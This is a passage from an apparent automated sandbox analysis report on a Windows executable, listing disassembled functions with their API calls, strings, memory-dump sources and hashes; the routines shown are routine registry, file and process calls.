                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 699fd1f27132e499a72d678966239612eac8b61dfe9d57f4c88cf0c32b356d0f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f042dff5c045186d33be5417afa4f05d679b9763972d2bb00463d131ea403ed4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 699fd1f27132e499a72d678966239612eac8b61dfe9d57f4c88cf0c32b356d0f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD01D8706282406BEB00EB65E981B9C3F99AB5430CF5040BBF900A72D3D73C9945871D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0047C310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C596,00000000,0047C5AC,?,?,?,?,00000000), ref: 0047C372
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                                                                                                                  • String ID: RegisteredOrganization$RegisteredOwner
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3535843008-1113070880
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 634078ff0e474af831ce18fa40e897e48b4e4349eb04070b88f5601e6398850b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cd6b81515cbcb541a42d20c803a6709c30f964b406f28b15d8fe69fce277d2ff
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 634078ff0e474af831ce18fa40e897e48b4e4349eb04070b88f5601e6398850b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41F09030704204ABEB00D669ECD2BAA33A99746304F60C03FA9088B392D6799E01CB5C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004979D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0047CD84: FreeLibrary.KERNEL32(00000000,004814B7), ref: 0047CD9A
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0047CA54: GetTickCount.KERNEL32 ref: 0047CA9E
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004570CC: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004570EB
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049832B), ref: 00497A29
                                                                                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049832B), ref: 00497A2F
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Detected restart. Removing temporary directory., xrefs: 004979E3
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Detected restart. Removing temporary directory.
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1717587489-3199836293
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e611eeaa9fed28cadb8c69ef2edffd8a52967f1f4ce985551ff58b7f7fd4f302
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 93f06bea8fcfa1b224d7ac257058da4e76460d04d1e35911cc499d3d1c0dfa98
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e611eeaa9fed28cadb8c69ef2edffd8a52967f1f4ce985551ff58b7f7fd4f302
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51E0553120C3002EDA02B7B2BC52A2F7F8CD701728311083BF40882452C43D1810C77D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004754BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004756F3), ref: 004754E1
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004756F3), ref: 004754F8
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2528220319-823142352
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 40c84172ef643bf56fca3451ce3bde360ac6963f3f9a8be57c20d0983807ed04
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 40e201e46ebb19b1d9bf90fbf766f72b309683208074062896c4944ddf319cda
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40c84172ef643bf56fca3451ce3bde360ac6963f3f9a8be57c20d0983807ed04
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDE065702403447FDA10F769CCC6F4577889B14729F10C155B5446F3D2C5B9EC408628
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042DE2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                                                                                                                                                                                                  • String ID: System\CurrentControlSet\Control\Windows$c6H
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 71445658-1548894351
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 532c08fc3a5ebe879a42036bede715a90f251433598981f36561c2967c82051c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b14c86e398362f8621ba381b59967aff518ca924b2daa5b46ce173f8349262a2
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 532c08fc3a5ebe879a42036bede715a90f251433598981f36561c2967c82051c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BFD0C772950128BBDB00DA89DC41DFB775DDB15760F45441BFD049B141C1B4EC5197F8
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00403344 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00498586), ref: 0040334B
                                                                                                                                                                                                                                                                                                                                                                  • GetCommandLineA.KERNEL32(00000000,00498586), ref: 00403356
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CommandHandleLineModule
                                                                                                                                                                                                                                                                                                                                                                  • String ID: 6f
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2123368496-3388785028
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ff8fa06d391bd0b31f892a344b3e95d40f530220570fde7b1ba7fad45aeb04f1
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45C002609013058AD754AF7579467162A94D751349F80447FF114BA3E1D77C82055BDD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00455660 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1458359878-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e53a20fce1e019891887c2340ded25f3f61bd14eb2329f15f37d70df2aaf943f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a2606c7dd4c17da0a3c90c20a229de96912268129783a4208f21052e6a4fbdd3
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e53a20fce1e019891887c2340ded25f3f61bd14eb2329f15f37d70df2aaf943f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62F02436B01D64578F20A59E998193F63DDEA94376750013BFC0CDB303D438CC098AA9
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%